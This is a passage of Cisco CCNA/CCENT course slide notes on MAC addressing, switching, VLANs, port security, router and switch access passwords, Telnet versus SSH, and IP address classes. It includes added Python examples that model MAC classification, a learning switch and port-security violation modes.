• As for the connection to the switch, you need to make sure you connect the RJ-45 connector on the other end of the rollover cable to the Console port of the switch. I'll drive this point home at least one more time elsewhere in the course!

Ethernet / NIC / Physical / LAN / BIA Addressing

• You may be thinking "oh, man, that's a lot of addressing!" Actually, it's not, because these are all different names for the same thing. The fifth name is the term you hear most often -- MAC address, short for Media Access Control.

• The MAC address is used by switches to send frames to the proper destination, as you'll see in the LAN Switching section. Before you get to that section, let's take a look at the format of the MAC address.


• The entire MAC address is a 48-bit address that looks a little something like this:

aa-bb-cc-11-22-33


• That MAC address actually has two parts, the first being the Organizationally Unique Identifier (OUI). The OUI is assigned to hardware vendors by the Institute of Electrical and Electronics Engineers (IEEE). A given OUI is assigned to one and only one vendor.

• The second half of the MAC address is a value not yet used by that particular vendor. Looking at the MAC address example given earlier, we now know that:
– The OUI is aa-bb-cc
– The vendor has not yet used 11-22-33 with that particular OUI, so the vendor is doing so now


• The MAC is sometimes called the physical address because it physically exists on the network card. The address is burned into the card, giving it yet another name - the Burned-In Address (BIA).

• As with IP addresses, we have broadcast and multicast MAC addresses. It's a good idea to be able to identify these addresses, and here's how to do it!


• The broadcast MAC address is the "all-Fs" address: ff-ff-ff-ff-ff-ff (or FF-FF-FF-FF-FF-FF, as case does not matter in hexadecimal)

• There is a range of multicast MAC addresses, and the first half of a multicast MAC address is always 0100.5e. The second half of a multicast MAC address will fall in the range 00-00-00 through 7F-FF-FF. Watch that 7! :)
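To make those rules concrete, here is an added Python example (it is not code from the course or from Cisco) that takes a MAC address in any of the three common notations, splits off the OUI, and classifies it as broadcast, IPv4 multicast or unicast using exactly the 0100.5e / 7F test above. It goes one step beyond the notes: the is_group_address check flags any address whose first octet has its low-order bit set, which is the general group-address test that the IPv4 multicast rule is a special case of (the Cisco 0100.0ccc.cccc address you will see in the MAC table shortly is an example of such an address). All function names are this example's own.

```python
"""MAC address anatomy: OUI split, broadcast and multicast detection.

Added example (not from the course notes). Accepts the three notations seen in
practice: Cisco dotted (aaaa.bbbb.cccc), hyphenated (aa-bb-cc-11-22-33) and
colon-separated (aa:bb:cc:11:22:33).
"""
import re

_HEX12 = re.compile(r"^[0-9a-f]{12}$")


def normalize_mac(mac: str) -> bytes:
    """Return the 6 raw bytes of a MAC written in any common notation.

    Raises ValueError for anything that is not exactly 48 bits of hex.
    """
    digits = re.sub(r"[.:\-]", "", mac.strip().lower())
    if not _HEX12.match(digits):
        raise ValueError(f"not a 48-bit MAC address: {mac!r}")
    return bytes.fromhex(digits)


def to_cisco(raw: bytes) -> str:
    """Format raw bytes the way IOS prints them: aaaa.bbbb.cccc."""
    h = raw.hex()
    return f"{h[0:4]}.{h[4:8]}.{h[8:12]}"


def oui(mac: str) -> str:
    """First half of the address: the IEEE-assigned Organizationally Unique Identifier."""
    return "-".join(f"{b:02x}" for b in normalize_mac(mac)[:3])


def vendor_part(mac: str) -> str:
    """Second half of the address: the value the vendor chose under that OUI."""
    return "-".join(f"{b:02x}" for b in normalize_mac(mac)[3:])


def is_broadcast(mac: str) -> bool:
    """The all-Fs address (case does not matter in hexadecimal)."""
    return normalize_mac(mac) == b"\xff" * 6


def is_ipv4_multicast(mac: str) -> bool:
    """First half is 01-00-5e and the second half is 00-00-00 through 7f-ff-ff.

    'Watch that 7': only the low 23 bits carry group information, so the
    fourth octet never exceeds 0x7f.
    """
    raw = normalize_mac(mac)
    return raw[:3] == b"\x01\x00\x5e" and raw[3] <= 0x7F


def is_group_address(mac: str) -> bool:
    """Generalisation beyond the notes: a MAC whose first octet has its
    low-order bit set is a group (multicast or broadcast) address."""
    return bool(normalize_mac(mac)[0] & 0x01)


def classify(mac: str) -> str:
    """Label an address: broadcast, ipv4-multicast, other-multicast or unicast."""
    if is_broadcast(mac):
        return "broadcast"
    if is_ipv4_multicast(mac):
        return "ipv4-multicast"
    if is_group_address(mac):
        return "other-multicast"
    return "unicast"


if __name__ == "__main__":
    for sample in ("aa-bb-cc-11-22-33", "ffff.ffff.ffff", "0100.5e7f.ffff",
                   "0100.5e80.0000", "0100.0ccc.cccc"):
        print(f"{sample:20} {to_cisco(normalize_mac(sample))}  {classify(sample)}")
```

The normalisation step matters in practice because the same address shows up as aaaa.aaaa.aaaa on a Cisco switch and as AA-AA-AA-AA-AA-AA in Windows ipconfig output; comparing the raw bytes avoids false mismatches when you check a switch's MAC table against a host.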


WAN Cabling

• Cisco routers will use serial cables for connections using their serial interfaces (typically Frame Relay)

• In home labs, you may connect Cisco router serial interfaces directly with a DTE/DCE cable


Cable Type Review

• Crossover cables are used to connect two like devices, typically two switches.

• Rollover cables are used to connect a laptop’s serial port to the router or switch Console port.

• Straight-through cables are used to connect a PC to a switchport.

• Watch the cable types and the cable lengths – any cable over 100 meters is cause for alarm.

Video 3: Switching

Switching

• Repeaters, Hubs and Bridges
• Building the MAC Table
• “Flood, Filter or Forward?”
• Frame Processing Methods
• Virtual LANs
• Cisco Three-Layer Switching Model
• Introduction to STP
• Basic Switch Security
• Port Security Defaults, Options and Configurations

• With many networking terms, the name is indeed the recipe, and that's very true of a repeater. A repeater's job is to repeat an electrical signal, the form that our data has taken to be sent across a cable. Remember, "it's all ones and zeroes!"

• The repeater takes an incoming signal and then generates a new, clean copy of that exact signal. This prevented maximum cable lengths from stopping transmissions, and also helped to ward off attenuation - the gradual weakening of an electric signal as it travels.

• A hub is basically the same as a repeater, but the hub will have more ports. That's the only difference between the two. (Some hubs have greater capabilities than others, but a "basic" hub is simply a multiport repeater.)

• Neither hubs nor repeaters have anything to do with the Data Link layer of the OSI model, nor do they perform any switching at all. Hubs and repeaters are strictly Physical layer devices, and that's where the trouble comes in. For our next example, we'll consider a hub with four PCs connected to it.

• To prevent this, a host on a shared Ethernet segment will use CSMA/CD (Carrier Sense Multiple Access with Collision Detection). To review, here's the CSMA/CD process:
– A host that wants to send data will first "listen to the wire", meaning that it checks the shared media to see if it's in use.
– If the media is in use, the host backs off for a few milliseconds before checking again.
– If the media is not in use, the host sends the data.

• If two PCs happen to send data at the exact same time, the voltage on the wire will actually change, indicating to the hosts that there has been a data collision.

• The two PCs that sent the data will generate a "jam signal", which indicates to the other hosts on the shared media that they should not send data due to a collision.

• Those two PCs both invoke a backoff timer, also in milliseconds. When each host's random timer expires, they will each begin the entire process again by listening to the wire. Since the backoff timer value is totally random, it's unlikely the two hosts will have the same problem again.

• Before we talk about switches, here's an old joke:
– Q. What's the difference between bridges and switches?
– A. Marketing.

• Let's review the key concepts of hubs vs. switches.
– With hubs, we've got one big collision domain consisting of all connected hosts. When hosts are connected to their own switch ports, they each have their own individual collision domain.
– Hubs only allow one device to transmit at a time, resulting in shared bandwidth. Switches allow hosts to transmit simultaneously.
– When one host connected to a hub sends a broadcast, every other host receives that broadcast and there's nothing we can do about it. When a host connected to a switch sends a broadcast, every other host receives it by default - but there is something we can do about that, as you'll see in the VLAN section of this course.


• Microsegmentation is a term sometimes used in Cisco documentation to describe the "one host, one collision domain" effect of that last bullet point. It's not a term I hear a great deal in the field, and you might not either, but it's a good term to know for Cisco exams.

• A Cisco switch will do one of three things with an incoming frame:
– Forward it
– Flood it
– Filter it

• To make this decision, the switch uses its MAC Address table to check if there's an entry for the destination MAC address - but first, the switch will actually check to see if there's an entry for the source MAC address of the frame, because it's that source MAC that the switch will use to actually build the table in the first place!

SW1#show mac-address-table
          Mac Address Table
-------------------------------------------
Vlan    Mac Address       Type        Ports
----    -----------       --------    -----
 All    0008.7de9.9800    STATIC      CPU
 All    0100.0ccc.cccc    STATIC      CPU
 All    0100.0ccc.cccd    STATIC      CPU
 All    0100.0cdd.dddd    STATIC      CPU
   1    aaaa.aaaa.aaaa    DYNAMIC     Fa0/1
Total Mac Addresses for this criterion: 5

SW1#show mac-address-table dynamic
          Mac Address Table
-------------------------------------------
Vlan    Mac Address       Type        Ports
----    -----------       --------    -----
   1    aaaa.aaaa.aaaa    DYNAMIC     Fa0/1
Total Mac Addresses for this criterion: 1

• No, so the switch will create one.

SW1#show mac-address-table dynamic
          Mac Address Table
-------------------------------------------
Vlan    Mac Address       Type        Ports
----    -----------       --------    -----
   1    aaaa.aaaa.aaaa    DYNAMIC     Fa0/1
   1    cccc.cccc.cccc    DYNAMIC     Fa0/2

SW1#show mac-address-table dynamic
          Mac Address Table
-------------------------------------------
Vlan    Mac Address       Type        Ports
----    -----------       --------    -----
   1    aaaa.aaaa.aaaa    DYNAMIC     Fa0/1
   1    bbbb.bbbb.bbbb    DYNAMIC     Fa0/1
   1    cccc.cccc.cccc    DYNAMIC     Fa0/2
   1    dddd.dddd.dddd    DYNAMIC     Fa0/3


• We don't get to say "never" in networking very often, and as you progress in your studies, you'll learn there's almost always an exception to the rule in CiscoLand. (That's what makes it fun, though!) There is no exception to this particular rule, though:

• Switches never send a frame back out the same port it came in on.

• Flooding is performed when the switch has no entry for the frame's destination MAC address. When a frame is flooded, it is sent out every single port on the switch except the one it came in on. Unknown unicast frames are always flooded.

• Forwarding is performed when the switch does have an entry for the frame's destination MAC address. Forwarding a frame means the frame is being sent out only one port on the switch.

• Filtering is performed when the switch has an entry for both the source and destination MAC address, and the MAC table indicates that both addresses are found off the same port.

• There's one other frame type that is sent out every port on the switch except the one that received it, and that's a broadcast frame. Broadcast frames are intended for all hosts, and the MAC broadcast address is ff-ff-ff-ff-ff-ff (or FF-FF-FF-FF-FF-FF, as a MAC address's case does not matter).
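As an added example (not from the course notes), the Python model below implements the learn-then-decide logic just described: learn the source MAC on the ingress port, then flood unknown unicasts and broadcasts, forward known unicasts, and filter when source and destination sit behind the same port. The walkthrough() function replays the four hosts from the show mac-address-table outputs above (aaaa on Fa0/1, cccc on Fa0/2, bbbb also on Fa0/1, dddd on Fa0/3). The Switch class, its method names and the frames are this example's own.

```python
"""Flood, filter or forward: a minimal model of a learning switch.

Added example (not from the course notes). Single VLAN, one MAC table mapping
address -> port; port names and MACs mirror the show mac-address-table output
but the frames below are constructed for the simulation.
"""
from dataclasses import dataclass, field

BROADCAST = "ffff.ffff.ffff"


@dataclass
class Switch:
    ports: list
    mac_table: dict = field(default_factory=dict)

    def handle_frame(self, ingress: str, src: str, dst: str) -> tuple:
        """Return (decision, egress_ports) for one frame.

        decision is 'flood', 'forward' or 'filter'.
        """
        if ingress not in self.ports:
            raise ValueError(f"unknown port {ingress}")
        # Step 1: the source MAC is learned (or refreshed) on the ingress
        # port. This is how the table gets built in the first place.
        self.mac_table[src.lower()] = ingress
        dst = dst.lower()
        # Step 2: decide based on the destination. Broadcasts and unknown
        # unicasts go out every port except the one the frame arrived on.
        if dst == BROADCAST or dst not in self.mac_table:
            return "flood", [p for p in self.ports if p != ingress]
        egress = self.mac_table[dst]
        # Filter: source and destination are off the same port (a hub hangs
        # there, say), so the frame is dropped. This is also what enforces
        # the rule that a frame never goes back out the port it came in on.
        if egress == ingress:
            return "filter", []
        return "forward", [egress]

    def show_mac_table(self) -> str:
        """Render the table roughly as 'show mac-address-table dynamic' does."""
        lines = ["Vlan    Mac Address       Type        Ports",
                 "----    -----------       --------    -----"]
        for mac, port in sorted(self.mac_table.items()):
            lines.append(f"   1    {mac:<17} DYNAMIC     {port}")
        lines.append(f"Total Mac Addresses for this criterion: {len(self.mac_table)}")
        return "\n".join(lines)


def walkthrough() -> tuple:
    """Replay the slides' sequence; returns (decisions, switch)."""
    sw = Switch(ports=["Fa0/1", "Fa0/2", "Fa0/3"])
    frames = [
        ("Fa0/1", "aaaa.aaaa.aaaa", "cccc.cccc.cccc"),  # unknown dst -> flood
        ("Fa0/2", "cccc.cccc.cccc", "aaaa.aaaa.aaaa"),  # known dst -> forward
        ("Fa0/1", "bbbb.bbbb.bbbb", "aaaa.aaaa.aaaa"),  # same port -> filter
        ("Fa0/3", "dddd.dddd.dddd", BROADCAST),          # broadcast -> flood
    ]
    decisions = [sw.handle_frame(*frame)[0] for frame in frames]
    return decisions, sw


if __name__ == "__main__":
    decisions, sw = walkthrough()
    print(decisions)
    print(sw.show_mac_table())
```

Notice that the model learns from every frame's source address without any check, which is exactly why the port-security commands later in this section exist: whoever can send a frame into a port gets to write an entry into the table.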

• Now that we've looked at how the MAC table is built, let's take a look at the different names this table is called:
– CAM table (short for Content Addressable Memory)
– bridging table
– switching table
– MAC table

• Anytime you see those terms, they're referring to the MAC address table. Four names for the same thing? Welcome to networking! ;)

• Once the switch decides whether to forward, filter, or flood the frame, there's one more decision to be made - what processing method will be used to handle this forwarding?

• The processing options are:
– store-and-forward
– cut-through
– fragment-free

• This continual generation of new broadcasts is called a broadcast storm, and this is one storm that can sink your switch for good.

• A broadcast storm can overwhelm a switch's memory and CPU capabilities, rendering the switch virtually useless.


• To illustrate how Virtual LANs can help limit broadcast propagation, we'll assign an IP address to each one of our hosts and then take a look at the default Cisco switch settings for VLANs. The circle(s) will continue to illustrate the broadcast domain(s). The numbers on the switch indicate the switch port that's connected to that host.

• It's vital to remember that no traffic - pings or data packets - can be sent from one VLAN to another without the intervention of a Layer 3 device, most likely a router.

• The first time you hear the term "campus network" or "campus LAN", the word "campus" may suggest a university or a school of some kind. While such a school may well have a campus LAN, that term is used to describe any network that connects multiple buildings that are physically close to each other.

• The Cisco switching model consists of three layers:
– Access
– Distribution
– Core


• Cisco switches use the Spanning Tree Protocol (STP) to prevent switching loops, and luckily, STP is enabled by default. You'll learn much more about STP in your CCNA studies, but you need to know its basics now. STP will determine a loop-free path for frames, and ports that are not on that path will be placed into blocking mode.

• The first one is about as basic as it gets. Lock up your switches - preferably more than once!

• No casual passerby should even know your switches exist, much less be able to yank a cable out just for the fun of it. Many server rooms have passcard systems or at least a locked door, but occasionally I still see a server room that's relying on the kindness of strangers.

• Don't do that!


• Unused VLANs - An Often Overlooked Security Feature

• We spoke about VLANs at length earlier in this section, but you can also use an unused VLAN as a security feature.

• Cisco switch ports on many models have some undesirable defaults:
– They're open, where router interfaces are shut by default
– They're actively attempting to trunk, meaning they are available for connection to another switch
– All ports are in VLAN 1, and everyone knows that

• These are not desirable defaults when it comes to unused ports on a switch. From top to bottom, here's how we can change those defaults to increase switch security:
– Close unused ports with the shutdown command
– Prevent the port from trunking with the switchport mode access command
– Place the port into an unused VLAN


• As usual, the switch will first inspect the source MAC address of an incoming frame. If the incoming source MAC address is considered secure, the user will be able to access the network. If the source MAC is considered non-secure, the port will take one of several actions - more on that in a moment. The source MAC address of the incoming frame really acts as a password.


• aging allows you to set aging options for secure MAC addresses.

• mac-address allows you to specify secure MAC addresses.

• maximum allows you to specify how many secure MAC addresses there will be. The default is one.

• violation allows you to specify what should happen if a non-secure source MAC address is received on the port. Those options are:

SW2(config-if)#switchport port-security violation ?
  protect   Security violation protect mode
  restrict  Security violation restrict mode
  shutdown  Security violation shutdown mode

• The default mode is shutdown, and this mode shuts the port down, transmits a message to the log indicating the action taken, and drops the violating frames. The interface status will be err-disabled (short for error-disabled), meaning it must be manually reopened.

• restrict drops the violating frames and transmits a message to the log indicating an issue, but does not shut the port down.

• protect simply drops the violating frames.

• To configure the port to shut down if a frame is received with any source MAC address other than bb-bb-bb-bb-bb-bb, we'd use the following config:

SW2(config)#int fast 0/3
SW2(config-if)#switchport mode access
SW2(config-if)#switchport port-security
SW2(config-if)#switchport port-security mac-address bbbb.bbbb.bbbb


• There's always a chance that you don't know the source MAC address that should act as the secure address. If you configure the port with sticky port security (don't blame me, I didn't name it!), the first source MAC address learned on the port will be the secure address, and all others will be non-secure unless you use the maximum option to change that.

SW2(config-if)#switchport port-security mac-address sticky


• The command show port-security interface fast0/3 verifies that port security is running, the port status, violation mode, the number of secure MAC addresses, and even the last source address of the last frame received!

SW2#show port-security int fast 0/3
Port Security              : Enabled
Port Status                : Secure-up
Violation Mode             : Shutdown
Aging Time                 : 0 mins
Aging Type                 : Absolute
SecureStatic Address Aging : Disabled
Maximum MAC Addresses      : 1
Total MAC Addresses        : 1
Configured MAC Addresses   : 0
Sticky MAC Addresses       : 1
Last Source Address        : 00d0.58ad.4d51
Security Violation Count   : 0

• That sticky MAC address will also appear in the config.

interface FastEthernet0/3
 switchport mode access
 switchport port-security
 switchport port-security mac-address sticky
 switchport port-security mac-address sticky 00d0.58ad.4d51


• To illustrate what happens when a non-secure address hits that port, I've disconnected the host with the learned secure sticky address and replaced it with another host. What's the result?

SW2#show int fast 0/3

FastEthernet0/3 is down, line protocol is down (err-disabled)


• An err-disabled port! When you see err-disabled next to the line protocol message, that means that an error of some kind has shut that port down. In this case, that's the result of a non-secure MAC address hitting a port that had already learned another address as secure.

• A couple of important points regarding err-disabled ports:
– The port LED will go dark
– The port must be manually reopened with the no shutdown command


• The reason for the port shutdown can be verified with show port-security interface. The port status is "Secure-shutdown", the violation mode is in the default of shutdown, and note that the last source address shown is not the one we saw earlier - that's the reason the port shut down.

SW2#show port-security int fast 0/3
Port Security              : Enabled
Port Status                : Secure-shutdown
Violation Mode             : Shutdown
Aging Time                 : 0 mins
Aging Type                 : Absolute
SecureStatic Address Aging : Disabled
Maximum MAC Addresses      : 1
Total MAC Addresses        : 1
Configured MAC Addresses   : 0
Sticky MAC Addresses       : 1
Last Source Address        : 0010.7b39.c5e9
Security Violation Count   : 1

• If we want both this address and the previous one to be secure, we can change the port-security maximum value to 2 and then reopen the port.

SW2(config-if)#switchport port-security maximum 2
SW2(config)#int fast 0/3
SW2(config-if)#shutdown
SW2(config-if)#no shutdown
SW2(config-if)#^Z
SW2#
4d10h: %LINK-5-CHANGED: Interface FastEthernet0/3, changed state to administratively down
4d10h: %LINK-3-UPDOWN: Interface FastEthernet0/3, changed state to down
4d10h: %LINK-3-UPDOWN: Interface FastEthernet0/3, changed state to up
4d10h: %LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet0/3, changed state to up

• Verify the interface is indeed back up with show interface:

SW2#show int fast 0/3

FastEthernet0/3 is up, line protocol is up (connected)


• Verify the changes to the port security scheme:

SW2#show port-security int fast 0/3
Port Security              : Enabled
Port Status                : Secure-up
Violation Mode             : Shutdown
Aging Time                 : 0 mins
Aging Type                 : Absolute
SecureStatic Address Aging : Disabled
Maximum MAC Addresses      : 2
Total MAC Addresses        : 1
Configured MAC Addresses   : 0
Sticky MAC Addresses       : 1
Last Source Address        : 0010.7b39.c5e9
Security Violation Count   : 0
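To tie the port-security pieces together (the maximum and sticky options, the three violation modes, the err-disabled state and the shutdown / no shutdown recovery), here is an added Python model of one secure port. It is this example's own code, not IOS and not from the course: the SecurePort class, its method names and its log wording are invented for the example, while the two MAC addresses are the ones from the transcript. walkthrough() replays the sequence above, and compare_modes() shows what the same violation does under protect, restrict and shutdown.

```python
"""Port security on one access port: sticky learning, maximum, violation modes.

Added example; the SecurePort class and its log messages are this example's own
model of the behaviour described by 'show port-security interface', not IOS code.
"""


class SecurePort:
    """Models 'switchport port-security' as configured on a single port."""

    MODES = ("protect", "restrict", "shutdown")

    def __init__(self, name, maximum=1, violation="shutdown", sticky=False,
                 configured=()):
        if violation not in self.MODES:
            raise ValueError(f"unknown violation mode {violation!r}")
        self.name = name
        self.maximum = maximum                 # default: one secure address
        self.violation = violation             # default: shutdown
        self.sticky = sticky
        self.configured = {m.lower() for m in configured}  # static secure MACs
        self.sticky_macs = set()               # learned, and written to the config
        self.dynamic = set()                   # learned, lost on reload
        self.status = "Secure-up"
        self.last_source = None
        self.violation_count = 0
        self.log = []                          # what would be sent to the log

    @property
    def secure_macs(self):
        return self.configured | self.sticky_macs | self.dynamic

    def receive(self, src_mac):
        """Process one frame's source MAC; return 'accept' or 'drop'."""
        src_mac = src_mac.lower()
        if self.status == "Secure-shutdown":
            return "drop"                      # err-disabled: nothing passes
        self.last_source = src_mac
        if src_mac in self.secure_macs:
            return "accept"
        if len(self.secure_macs) < self.maximum:
            # Still room under 'maximum': the address becomes secure.
            (self.sticky_macs if self.sticky else self.dynamic).add(src_mac)
            return "accept"
        # A non-secure source MAC on a full port is a violation.
        self.violation_count += 1
        if self.violation == "shutdown":
            self.status = "Secure-shutdown"    # interface goes err-disabled
            self.log.append(f"{self.name}: violation by {src_mac}, port err-disabled")
        elif self.violation == "restrict":
            self.log.append(f"{self.name}: violation by {src_mac}, frame dropped")
        # 'protect' drops silently: no log entry, no shutdown.
        return "drop"

    def shut_no_shut(self):
        """Manual recovery: 'shutdown' then 'no shutdown' on the interface."""
        self.status = "Secure-up"
        self.violation_count = 0

    def show(self):
        """Rough rendering of 'show port-security interface' for this port."""
        return "\n".join([
            f"Port Status                : {self.status}",
            f"Violation Mode             : {self.violation.capitalize()}",
            f"Maximum MAC Addresses      : {self.maximum}",
            f"Total MAC Addresses        : {len(self.secure_macs)}",
            f"Configured MAC Addresses   : {len(self.configured)}",
            f"Sticky MAC Addresses       : {len(self.sticky_macs)}",
            f"Last Source Address        : {self.last_source}",
            f"Security Violation Count   : {self.violation_count}",
        ])


def walkthrough():
    """Replay the transcript: sticky learning, a second host trips the port,
    then the maximum is raised to 2 and the port is reopened."""
    port = SecurePort("Fa0/3", sticky=True)
    port.receive("00d0.58ad.4d51")            # first host: learned as sticky
    port.receive("0010.7b39.c5e9")            # second host: violation, err-disabled
    port.maximum = 2                          # switchport port-security maximum 2
    port.shut_no_shut()
    port.receive("0010.7b39.c5e9")            # now accepted as the second sticky MAC
    return port


def compare_modes(secure="00d0.58ad.4d51", rogue="0010.7b39.c5e9"):
    """Same violation under each mode: (frame result, port status, log entries)."""
    results = {}
    for mode in SecurePort.MODES:
        port = SecurePort("Fa0/3", violation=mode, configured=[secure])
        results[mode] = (port.receive(rogue), port.status, len(port.log))
    return results


if __name__ == "__main__":
    print(walkthrough().show())
    print(compare_modes())
```

The compare_modes() output is the practical takeaway for a defender: protect drops the frame and tells nobody, so a port in protect mode can be under a MAC-spoofing attempt for weeks without a log entry; restrict logs it; shutdown logs it and takes the port out of service until someone looks.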

Video 4: Common Router and Switch Commands

Common Router and Switch Commands

• Physical Connections and Passwords
• Telnet And SSH
• User, Enable and Privilege Modes
• Enable Password vs. Enable Secret
• “privilege level 15”
• Physical Side of Cisco Switches
• Assigning an IP Address and Default Gateway To The Switch
• Speed, Duplex, and “Interface Range”
• Banners, “logging synch”, and “exec-timeout”
• Keystroke Shortcuts and Manipulating History

• What I'm about to say is probably a little more true of a router than a switch, but there are two "problems" with the initial configuration of a Cisco device:
– Some features that you do want to use will not be enabled
– Some features that you might not want to have running will be running by default

line con 0
line vty 0 4
 login
line vty 5 15
 login

• This small, seemingly insignificant portion of the switch configuration actually determines what passwords a user must enter in order to connect to the switch successfully. When you do connect to a Cisco switch, you're going to do so in one of two ways:
– By physically connecting a laptop to the switch
– By logically connecting from a remote location via Telnet or SSH

• For a physical connection, you're going to need a rollover cable. This is typically a blue cable with an RJ-45 connector on one end and a DB-9 connector on the other end. The RJ-45 connector snaps into the Console port of the switch or router, and the DB-9 connector connects to your laptop -- maybe!

• Did you notice that we were not prompted for a password when connecting through the console port? That means that anyone with a laptop and a rollover cable can connect successfully to this switch - and we might not want that! Let's take another look at the password portion of our switch's configuration:

line con 0
line vty 0 4
 login
line vty 5 15
 login

• To protect the switch's console port, it's the "line con 0" we need to be concerned with. If we're going to use a single password to protect the console port, we'll actually need two commands:
– the password command (the one everyone remembers)
– the login command (the one a lot of people forget - except you!)

• To review the methods available to connect to a Cisco router:
– Physically connecting a laptop to the Console port
– Connecting from a remote location via Telnet or SSH


• We're going to telnet from one Cisco router to another in this example, but there is one major rule that holds true for any Telnet configuration on a Cisco router or switch:

• You must configure a password on the VTY lines. Without a password on the VTY lines, no user will be able to telnet to a Cisco router or switch!


User, Enable, And Privilege Modes

• When you first connect to a Cisco router or switch via Telnet or SSH, by default you're going to be placed into user exec mode. This mode is indicated by the ">" symbol after the device name.

R1>


• To configure the router, we need to go to the next level, privileged EXEC mode (generally called "enable mode"). To get there, we need to enter the enable command in user exec mode. The prompt should change slightly...

R1>enable
R1#


• Using an enable mode password is optional - unless you have users connecting via Telnet. (Thought I had forgotten about the Telnet discussion, didn't you? We're getting back to that in just a minute!)

• To recap:
– No password is required for connecting to the router via the Console port, but it's recommended that you configure one.
– A password on the VTY lines is required to allow Telnet or SSH users to connect.
– For Telnet and SSH users to access enable mode, either an enable password must be configured OR the following command must be configured on the VTY lines.

• You may want incoming Telnet users to be placed directly into privileged exec mode without being prompted for an enable password. To do so, configure the privilege level 15 command on the VTY lines of the router or switch allowing the connections.

What's So Secure About Secure Shell?

• Telnet's a great way to communicate remotely with routers and switches, but there's a problem - all of the data sent to the remote host, including passwords, is transmitted in clear text. Any would-be network intruder who intercepts the password transmission can then easily enter the network via Telnet, and then we're in real trouble!

• With SSH, we need to create a username / password database. It sounds complex, but it's not. I'll show you how to create one on a Cisco switch in just a moment. We could also set up an AAA server (Authentication, Authorization, and Accounting) that would handle authentication. Setting up an AAA server is out of the scope of the CCENT and CCNA exams, but you should know the commands for setting up a Cisco switch to perform authentication via a local username/password database.

• We could use the username/password command to create a database strictly for Telnet if we wanted to, and the login local command would have the same effect. Where the Telnet and SSH configuration differ is that the SSH config requires the following where Telnet does not:
– A domain name must be specified with the ip domain-name command
– A crypto key must be created with the crypto key generate rsa command

• Green always means "good"
• Amber indicates a problem if it doesn't go away in a few seconds
• If a host is connected to a switch port and the LED is dark, that's usually really bad

• SYST, short for system. Green means the switch is on, no light means it isn't. :)

• If you see SYST go amber, that indicates a failed Power-On Self Test (POST), and you'll get a message indicating the reason for that failure in the console output. A failed POST indicates a serious problem with the switch, and the switch will not even attempt to load an IOS. A typical POST problem is a broken fan - if you have no ventilation inside the switch, there's no reason for the switch to power up!


• RPS (Redundant Power Supply). Green indicates that the RPS is functioning correctly.

• STAT, short for status. When this is green, the port status lights are operational.

• DUPLEX, where green indicates a full-duplex port and an "off" light indicates a half-duplex port

• SPEED, where solid green indicates a 100 MBPS port, off indicates a 10 MBPS port, and flashing green indicates a Gigabit Ethernet port (1000 MBPS)

• Each individual port will have an LED as well.

• When you first connect a host's cable to a switch port, you should see it go amber for a few seconds while the speed and duplex are negotiated. If all goes well, the LED goes green. If the light stays amber, there's a problem with a setting on either the host or the switch that needs to be resolved. (Really narrows it down, eh?)

• There's one other common issue that a lack of LEDs can help you track down very quickly. In the cabling section, I mentioned that crossover cables are used to connect two switches to create a trunk. When you connect two Cisco switches with a crossover cable, you should see the lights go amber for just a few seconds and then go green. If you don't see any lights for a few seconds, you can stop waiting - you're using straight-through cables by mistake!

So What Are Those "logging synchronous" and "exec-timeout 0 0" Commands, Anyway?

• You might have noticed these two commands on the console line:

line con 0
 exec-timeout 0 0
 logging synchronous

• I've been recommending these commands for years to CCNA and CCNP candidates putting their own home labs together, but they can come in handy on the job as well. Let's take these commands one at a time, starting with the logging synchronous command.

R1(config)#int s0
R1(config-if)#no shut
R1(config-if)#^Z
R1#so here i am
4d04h: %SYS-5-CONFIG_I: Configured from console by console
typ
4d04h: %LINK-3-UPDOWN: Interface Serial0, changed state to up
ing and
4d04h: %LINEPROTO-5-UPDOWN: Line protocol on Interface Serial0, changed state to up
i've been interrupted quite badly!
4d04h: %LINEPROTO-5-UPDOWN: Line protocol on Interface Serial0, changed state to down


• By configuring the logging synchronous command on the console port, you're telling the router to hold such messages until it detects no input from the keyboard and no other output from the router, such as a show command's output.

• One of my favorites is the up arrow, which will show you the last command you entered. If you continue to hit the up arrow, you'll continue to go through the command history. <CTRL-P> does the same thing.

• As you might expect, the down arrow brings you one command up in the command history. It's a good key to use when you use the up arrow too fast. :) <CTRL-N> does the same thing.

• <CTRL-A> takes the cursor all the way to the front of your current command; <CTRL-E> takes the cursor all the way to the end of your current command.

• Want to move around on a per-character basis in your current command without deleting characters? Use the left arrow or <CTRL-B> to move backward one character, and use the right arrow or <CTRL-F> to move forward one character.

© Train Signal, Inc., 2002-2007

• <CTRL - D > deletes one character. You can do the same thing with the BACKSPACE key.

• < ESC - B > moves back one word in the current command.

• < ESC - F > moves forward one word in the current command.

Page 56: Notes

Video 5: IP Addressing And The Routing Process

IP Addressing and the Routing Process

• IP Addressing and Binary Conversions
• IP Address Classes
• Private IP Address Ranges
• Intro to the Routing Process
• Keeping Subnets On One “Side” of the Router

• If you've worked as a network admin for any length of time, you're already familiar with IP addresses. Every PC on a network will have one, as will other devices such as printers. The term for a network device with an IP address is host, and I'll try to use that term as often as possible to get you used to it!

• The PC...err, the host I'm creating this document on has an IP address, shown here with the Microsoft command ipconfig.

Page 57: Notes


• First, we'll convert the IP address 192.168.1.100 to a binary string. The format that we're used to seeing IP addresses take - like the 192.168.1.100 shown here - is often called a dotted decimal address, since the values are in decimal and there are dots separating the decimals. (Clever, eh?)


• If you know the basics of binary and decimal conversions, AND practice these skills diligently, you can answer any subnetting question Cisco asks you.


• I'll go ahead and show you the entire binary string for the IP address 192.168.1.100 below, and the subnet mask is expressed in binary directly below it.

192.168.1.100 = 11000000 10101000 00000001 01100100

255.255.255.0 = 11111111 11111111 11111111 00000000

Page 58: Notes

• Way back in the ancient times of technology - September 1981, to be exact - IP address classes were defined in RFC 791. If you'd like to read the actual RFC, you can find it quickly using that number and your favorite search engine.

• RFCs are Requests For Comments, which are technical proposals and/or documentation. Not always exciting, but it's well worth reading the RFC that deals with the subject you're studying. Advanced technical exams occasionally like to ask about RFC numbers for a particular protocol or network service.

• To earn your CCENT and CCNA certifications, you've got to know these address classes and be able to identify what class an IP address belongs to. Here are the three ranges of addresses that can be assigned to hosts:
– Class A: 1 - 126
– Class B: 128 - 191
– Class C: 192 - 223

• The following classes are reserved and cannot be assigned to hosts:
– Class D: 224 - 239. Reserved for multicasting, a topic not covered on the CCENT or CCNA exams.
– Class E: 240 - 255. Reserved for future use, also called "experimental addresses".
– Any address with a first octet of 127 is reserved for loopback interfaces. This range is *not* for Cisco router loopback interfaces, though.

Page 59: Notes

• Class A:
– Default network mask: 255.0.0.0
